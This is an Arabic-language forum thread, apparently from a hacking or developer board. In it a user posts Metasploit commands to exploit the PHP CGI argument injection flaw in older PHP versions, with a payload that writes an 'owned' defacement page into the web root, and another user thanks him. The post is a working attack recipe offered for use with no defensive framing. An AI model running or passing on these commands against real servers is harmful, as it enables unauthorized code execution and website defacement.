الوسوم:
حالة الموضوع:
مغلق
  1. Spamber Dz

    Spamber Dz Developer

    الأنتساب:
    ‏30 ديسمبر 2012
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Dz
    السلام عليكم

    الثغره شغاله علي الاصدار علي الاصدارات التاليه
    PHP versions before 5.3.12
    الي
    PHP versions before 5.4

    الاكواد المستخدمه طبعآ في مشروع الميتاء

    كود PHP:
    use exploit/multi/http/php_cgi_arg_injection
    set RHOST localhost
    set TARGETURI 
    /phpinfo.php
    set PAYLOAD php
    /exec
    set CMD 
    echo owned /var/www/html/owned.html
    [YOUTUBE]bhgeBKICGlQ&list[/YOUTUBE]
     
  2. calipsou07

    calipsou07 Developer

    الأنتساب:
    ‏31 مارس 2012
    المشاركات:
    25
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    TUNISIE
    رد: PHP CGI Argument Injection

    يسلمو يا غالي​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة